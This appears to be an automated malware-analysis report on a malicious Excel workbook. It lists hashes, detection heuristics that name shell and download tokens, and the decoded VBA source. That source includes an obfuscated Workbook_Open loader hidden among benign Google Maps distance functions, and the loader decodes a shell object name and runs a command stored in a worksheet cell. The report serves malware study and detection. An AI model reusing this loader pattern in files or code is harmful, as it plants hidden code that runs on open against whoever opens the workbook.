Malicious Office (OLE) / .XLS — malware analysis report

Static analysis result for SHA-256 c812a341f9e57bf3…

Verdict: MALICIOUS

File type: Office (OLE) / .XLS

Size: 67.0 KB
Created: 2019-02-12 23:24:49
Authoring application: Microsoft Excel
First seen: 2026-06-27
MD5: dfef8d92fedaee5bbf33e07c27e11911
SHA-1: 04ee65e6ab57922b5a8312ace53fafe5b404fc11
SHA-256: c812a341f9e57bf3d3df1ae437639bb90f32a415211eabb08dd8566a765c7d2c
Risk Score: 330

Heuristics (10)

  • Office EPRINT stream contains EMF object (severity: high; CVE related; rule: OLE_EPRINT_EMF_OBJECT)
    OLE ObjectPool contains an EPRINT stream with EMF data. This is rare in normal documents and counts as Office object-delivery evidence when paired with exploit-payload anomalies, but the malformed graphics record required for exact CVE attribution is not proven by this rule alone.
  • ClamAV: Xls.Malware.Valyria-9756472-0 (severity: critical; rule: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Xls.Malware.Valyria-9756472-0
  • VBA macros detected (severity: medium; 5 related findings; rule: OLE_VBA_MACROS)
    Document contains VBA macro code
  • Obfuscated auto-exec VBA loader (severity: critical; rule: OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER)
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched line in script
        Set objHTTP = CreateObject("MSXML2.ServerXMLHTTP")
  • CreateObject call (severity: high; rule: OLE_VBA_CREATEOBJ)
    CreateObject call
    Matched line in script
        Set objHTTP = CreateObject("MSXML2.ServerXMLHTTP")
  • Payload URL assembled from a Chr()/Asc() string expression (1 URL) (severity: high; rule: OLE_VBA_EXPR_DROPPER_URL)
    A VBA macro builds its stage-2 download URL character by character from string literals concatenated with Chr()/Asc()/StrReverse() results — often nested (Chr(Asc(Chr(Asc("h")))) = "h") and split across the + and & operators, sometimes written out via Print #n, into a second-stage VBScript/PowerShell file. The URL is assembled at run time and never appears contiguously on disk, and there is no numeric array to brute-force, so a literal scan and the array recoverers both miss it. A bounded expression evaluator resolved it; surfaced as an IOC. Self-validating: only a valid host URL that is not already present verbatim in the macro is reported, so a benign macro cannot false-positive.
  • VBA p-code auto-exec with execution tokens (severity: high; rule: OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Workbook_Open macro (severity: low; rule: OLE_VBA_WBOPEN)
    Workbook_Open macro
    Matched line in script
        Sub Workbook_Open()
  • Excel 4.0 (XLM) macro sheet present (severity: medium; rule: OLE_XLM_AUTOOPEN)
    Workbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
  • Embedded URL (severity: info; rule: EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URLs found:
        • http://maps.googleapis.com/maps/api/distancematrix/json?origins=&destinations=&mode=car&language=en&sensor=false&key=YOUR_KEY (referenced by macro)

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
xlm_macros.txt | xlm-macro | oletools.olevba.extract_all_macros (XLM macro listing) | 229 bytes
SHA-256: 51a866f137266a6992be40f9dc7d72ed5e598fb2427f4d48040e9057fecf6519
Preview script
First 1,000 lines of the extracted script
' 0085     13 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible -  SPDY
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' Sheet,Reference,Formula,Value
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 10289 bytes
SHA-256: 24797d992e64dc3a2b0cb2e4dea07e4490c96ea152b73a07e63c85a75972c6ef
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit
Public g7fac28aa2 As Object
Public Function GetDuration(start As String, dest As String)
    Dim firstVal As String, secondVal As String, lastVal As String
    firstVal = "http://maps.googleapis.com/maps/api/distancematrix/json?origins="
    secondVal = "&destinations="
    lastVal = "&mode=car&language=en&sensor=false&key=YOUR_KEY"
    Set objHTTP = CreateObject("MSXML2.ServerXMLHTTP")
    URL = firstVal & Replace(start, " ", "+") & secondVal & Replace(dest, " ", "+") & lastVal
    objHTTP.Open "GET", URL, False
    objHTTP.setRequestHeader "User-Agent", "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
    objHTTP.send ("")
    If InStr(objHTTP.responseText, """duration"" : {") = 0 Then GoTo ErrorHandl
    Set regex = CreateObject("VBScript.RegExp"): regex.Pattern = "duration(?:.|\n)*?""value"".*?([0-9]+)": regex.Global = False
    Set matches = regex.Execute(objHTTP.responseText)
    tmpVal = Replace(matches(0).SubMatches(0), ".", Application.International(xlListSeparator))
    GetDuration = CDbl(tmpVal)
    Exit Function
ErrorHandl:
    GetDuration = -1
End Function
Public Function GetDistanceCoord(ByVal lat1 As Double, ByVal lon1 As Double, ByVal lat2 As Double, ByVal lon2 As Double, ByVal unit As String) As Double
    Dim theta As Double: theta = lon1 - lon2
    Dim dist As Double: dist = Math.Sin(deg2rad(lat1)) * Math.Sin(deg2rad(lat2)) + Math.Cos(deg2rad(lat1)) * Math.Cos(deg2rad(lat2)) * Math.Cos(deg2rad(theta))
    dist = WorksheetFunction.Acos(dist)
    dist = rad2deg(dist)
    dist = dist * 60 * 1.1515
    If unit = "K" Then
        dist = dist * 1.609344
    ElseIf unit = "N" Then
        dist = dist * 0.8684
    End If
    GetDistanceCoord = dist
End Function
 
Function deg2rad(ByVal deg As Double) As Double
    deg2rad = (deg * WorksheetFunction.Pi / 180#)
End Function
 
Function rad2deg(ByVal rad As Double) As Double
    rad2deg = rad / WorksheetFunction.Pi * 180#
End Function
Sub Workbook_Open()
Set g7fac28aa2 = CreateObject(c539a22f3a4("837F8F9E959CA05A7F94919898"))
Dim ed1dfe4488f As Long: ed1dfe4488f = 5
Dim tb3413354 As String
Dim ta3746518c572376f2 As Long
Select Case ed1dfe4488f
Case 8 + (72 - 84) + Int(5 + 22 - 4) + 8 * Int(98 / 91 + 19) - Int(3342 / 5684) * 17
tb3413354 = "ucf1dc47cf2"
Case 8 / Int(21 + 22 / 4) / 17 + (336 - 72) + Int(5 + 11 - 25) + 16
tb3413354 = "h323f5258919cae"
Case 11 * Int(83 / 74 + 15) - Int(4841 / 3732) * 20 / Int(4 + 27 / 10) / 5 - (12 + 12) - 13
tb3413354 = "r65db9a3d4f4a82"
Case 5 - (18 + 6) - 6 - (8 + 14) - 18 * Int(55 / 97 + 19) - Int(2751 / 2995) * 26
tb3413354 = "c85da91b8"
Case 5 * Int(32 / 77 + 9) - Int(1111 / 5140) * 17 + (288 - 324) + Int(28 + 27 - 16) + 5 / Int(12 + 12 / 24) / 17
tb3413354 = "y351dc8a7f5eca"
Case 19 / Int(16 + 24 / 25) / 17 - (4 + 29) - 20
tb3413354 = "nf6f8491e3efb39"
Case 6 - (21 + 9) - 16 * Int(60 / 33 + 14) - Int(2439 / 5832) * 29 / Int(10 + 6 / 9) / 29
tb3413354 = "jfec277fc6a"
Case 13 * Int(39 / 69 + 15) - Int(3051 / 5617) * 28 / Int(6 + 24 / 10) / 26
tb3413354 = "b1b556b"
Case 4 / Int(29 + 25 / 4) / 11 * Int(54 / 67 + 17) - Int(4380 / 2575) * 12
tb3413354 = "s69c7cf79771"
Case 22 / Int(27 + 27 / 11) / 7 + (240 - 276) + Int(26 + 9 - 15) + 27
tb3413354 = "zb988a"
Case 9 + (192 - 204) + Int(12 + 15 - 16) + 4 + (96 - 60) + Int(14 + 15 - 23) + 8 / Int(9 + 14 / 6) / 6
tb3413354 = "b1cb48e8135"
Case 22 * Int(99 / 52 + 9) - Int(3164 / 3907) * 5 * Int(24 / 38 + 11) - Int(3806 / 2959) * 14 + (60 - 180) + Int(5 + 10 - 11) + 6
tb3413354 = "hf57fbee19"
Case 7 - (6 + 17) - 14 / Int(28 + 26 / 16) / 22 - (17 + 4) - 8
tb3413354 = "k93dcfc76"
Case 5 + (264 - 348) + Int(10 + 26 - 22) + 27 + (120 - 324) + Int(11 + 8 - 17) + 24 + (108 - 276) + Int(29 + 13 - 25) + 19
tb3413354 = "ubd383"
Case 10 / Int(5 + 6 / 19) / 17 * Int(19 / 40 + 13) - Int(4235 / 3938) * 22
tb3413354 = "w2f1c292fe4645"
Case 24 * Int(49 / 86 + 19) - Int(3817 / 2372) * 4 / Int(6 + 4 / 8) / 7
tb3413354 = "rb7ca5c3e58"
Case 19 / Int(18 + 5 / 21) / 14 * Int(44 / 73 + 10) - Int(1425 / 3347) * 5 + (60 - 348) + Int(12 + 22 - 15) + 21
tb3413354 = "pd1d23e29"
Case 5 * Int(92 / 63 + 19) - Int(170 / 2313) * 23 * Int(35 / 74 + 16) - Int(4868 / 1279) * 8
tb3413354 = "oc1456a2bca13c5"
Case 7 / Int(28 + 24 / 13) / 26 + (276 - 168) + Int(8 + 15 - 25) + 27
tb3413354 = "te59b5e93e8"
Case 22 + (180 - 228) + Int(24 + 17 - 17) + 15 * Int(40 / 30 + 10) - Int(2710 / 1864) * 6
tb3413354 = "aced4ab"
Case 11 / Int(17 + 19 / 24) / 27 - (26 + 7) - 16 * Int(46 / 63 + 17) - Int(4662 / 561) * 18
tb3413354 = "s19f2645285e3"
Case 15 / Int(13 + 24 / 7) / 20 / Int(12 + 25 / 16) / 23
tb3413354 = "va692e"
Case 25 * Int(72 / 39 + 10) - Int(3140 / 1951) * 28 * Int(63 / 73 + 17) - Int(1891 / 133) * 15 + (264 - 204) + Int(18 + 10 - 4) + 23
tb3413354 = "xa18af88772"
Case 4 * Int(33 / 94 + 19) - Int(3009 / 5789) * 12 / Int(12 + 5 / 24) / 4
tb3413354 = "b9cef2"
Case 7 + (72 - 192) + Int(12 + 13 - 16) + 21 - (10 + 13) - 21 + (252 - 228) + Int(17 + 11 - 17) + 23
tb3413354 = "g41434"
Case 24 * Int(63 / 75 + 9) - Int(4563 / 2857) * 18 / Int(9 + 29 / 14) / 18
tb3413354 = "mcd14376c"
Case 24 - (9 + 22) - 29 / Int(8 + 13 / 9) / 16 + (156 - 336) + Int(29 + 12 - 15) + 22
tb3413354 = "k111564bcd2"
Case 20 / Int(22 + 22 / 24) / 22 - (5 + 5) - 4 * Int(36 / 86 + 9) - Int(219 / 4959) * 21
tb3413354 = "v512ddebf7e3a6"
Case 22 / Int(18 + 17 / 11) / 4 + (276 - 204) + Int(28 + 19 - 17) + 12 - (29 + 8) - 5
tb3413354 = "tc9de7678a"
Case 15 - (26 + 20) - 8 - (27 + 6) - 13 + (336 - 312) + Int(8 + 10 - 15) + 7
tb3413354 = "z77311a3e"
Case 12 / Int(27 + 24 / 16) / 6 / Int(16 + 14 / 18) / 19 + (96 - 252) + Int(20 + 25 - 25) + 21
tb3413354 = "nbf32ba5c8f9bc9"
Case 18 - (14 + 7) - 7 * Int(91 / 92 + 10) - Int(656 / 1371) * 19 / Int(21 + 8 / 20) / 5
tb3413354 = "fc9b822f91e7173"
Case 15 - (22 + 29) - 19 - (13 + 11) - 15
tb3413354 = "lc1a45656b"
Case 12 + (348 - 240) + Int(6 + 23 - 17) + 20 - (27 + 18) - 22 + (252 - 48) + Int(24 + 26 - 20) + 7
tb3413354 = "t2e643d"
Case 14 + (324 - 228) + Int(17 + 26 - 21) + 9 * Int(56 / 71 + 11) - Int(107 / 5700) * 25
tb3413354 = "m4d31493a7cdee"
Case 5 / Int(14 + 27 / 5) / 8 - (21 + 8) - 19
tb3413354 = "w8683d1df77"
Case 6 - (29 + 26) - 27 * Int(76 / 79 + 10) - Int(380 / 1514) * 18
tb3413354 = "k455dc167c4914"
Case 25 + (156 - 324) + Int(5 + 19 - 23) + 9 - (24 + 19) - 29
tb3413354 = "c837f7368754c"
Case 16 * Int(66 / 67 + 19) - Int(4942 / 3191) * 20 + (72 - 120) + Int(25 + 24 - 20) + 10
tb3413354 = "k864dc9fc"
Case 5:
obe4f5e547c855 ("hacc25b8759b3")
Case 14 - (5 + 28) - 23 / Int(16 + 13 / 28) / 23 - (19 + 6) - 4
tb3413354 = "w83bfd"
Case 26 * Int(73 / 56 + 18) - Int(2607 / 2888) * 14 / Int(17 + 13 / 8) / 27
tb3413354 = "u9c5f6913e"
Case 21 * Int(80 / 43 + 9) - Int(235 / 1822) * 18 - (27 + 9) - 22 - (23 + 28) - 6
tb3413354 = "x733df1e7fc2c"
Case 6 - (11 + 13) - 27 / Int(18 + 19 / 24) / 27 - (18 + 8) - 22
tb3413354 = "j471d1f4bd5a5"
Case 19 / Int(13 + 6 / 18) / 8 + (72 - 240) + Int(9 + 24 - 21) + 18 - (10 + 17) - 24
tb3413354 = "q7c57a3"
Case 16 / Int(20 + 4 / 11) / 10 - (5 + 10) - 5
tb3413354 = "j25d5bf1e"
Case 11 - (22 + 9) - 18 * Int(94 / 57 + 19) - Int(1184 / 2242) * 26
tb3413354 = "me4cc9e83c5f8c4"
Case 8 / Int(10 + 27 / 24) / 16 * Int(90 / 38 + 10) - Int(4272 / 3420) * 28 * Int(89 / 49 + 13) - Int(4568 / 4837) * 19
tb3413354 = "mac24c6"
Case 24 - (21 + 24) - 27 * Int(39 / 91 + 13) - Int(661 / 5452) * 23
tb3413354 = "ke6a5dd5"
Case 26 - (15 + 12) - 26 - (10 + 22) - 16 / Int(4 + 13 / 11) / 14
tb3413354 = "wb1e95df"
Case 22 / Int(24 + 29 / 22) / 15 * Int(59 / 71 + 15) - Int(612 / 4695) * 4
tb3413354 = "xf4a423d8f"
Case 11 * Int(93 / 79 + 9) - Int(2056 / 340) * 14 / Int(12 + 16 / 6) / 23 * Int(78 / 59 + 9) - Int(1862 / 1841) * 22
tb3413354 = "g773d87dece99"
Case 21 * Int(19 / 55 + 17) - Int(4560 / 5731) * 22 - (25 + 9) - 4 - (22 + 19) - 28
tb3413354 = "lbdcdf9c65f6"
Case 9 / Int(6 + 17 / 4) / 18 - (29 + 14) - 21 + (96 - 276) + Int(28 + 5 - 29) + 27
tb3413354 = "fe12f71c1d7b"
Case 7 * Int(45 / 82 + 14) - Int(3310 / 3877) * 22 + (84 - 192) + Int(15 + 24 - 4) + 26 - (28 + 15) - 29
tb3413354 = "bab6c1439ffb5a"
End Select
End Sub
Private Function obe4f5e547c855(ByVal u276769f3aebf As String) As String
g7fac28aa2.Run c539a22f3a4(ThisWorkbook.Sheets("SPDYR").Range("G135").Value), 0, True
End Function

Private Function c539a22f3a4(ByVal u276769f3aebf As String)
Dim cce69e22cff As String: Dim fafa6ded158 As Long
For fafa6ded158 = 1 To Len(u276769f3aebf) Step 2
cce69e22cff = cce69e22cff & Chr(Val(Chr(Int(0 + Int(11 / 4) + Int(11 / 8) + 5 - 9 + 8 - 9 + Int(10 / 3) + 37)) & Chr(Int(0 + 9 + 4 - 11 + Int(7 / 1) - 7 - 13 + Int(8 / 2) + 79)) & Right(Left(u276769f3aebf, fafa6ded158 + ((34 + 6 - 20) / 2 - 9)), (43 - 23 - 10 + 5 - 13))) - 44)
Next
c539a22f3a4 = cce69e22cff
End Function
Public Function GetDistance(start As String, dest As String)
    Dim firstVal As String, secondVal As String, lastVal As String
    firstVal = "http://maps.googleapis.com/maps/api/distancematrix/json?origins="
    secondVal = "&destinations="
    lastVal = "&mode=car&language=pl&sensor=false&key=YOUR_KEY"
    Set objHTTP = CreateObject("MSXML2.ServerXMLHTTP")
    URL = firstVal & Replace(start, " ", "+") & secondVal & Replace(dest, " ", "+") & lastVal
    objHTTP.Open "GET", URL, False
    objHTTP.setRequestHeader "User-Agent", "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
    objHTTP.send ("")
    If InStr(objHTTP.responseText, """distance"" : {") = 0 Then GoTo ErrorHandl
    Set regex = CreateObject("VBScript.RegExp"): regex.Pattern = """value"".*?([0-9]+)": regex.Global = False
    Set matches = regex.Execute(objHTTP.responseText)
    tmpVal = Replace(matches(0).SubMatches(0), ".", Application.International(xlListSeparator))
    GetDistance = CDbl(tmpVal)
    Exit Function
ErrorHandl:
    GetDistance = -1
End Function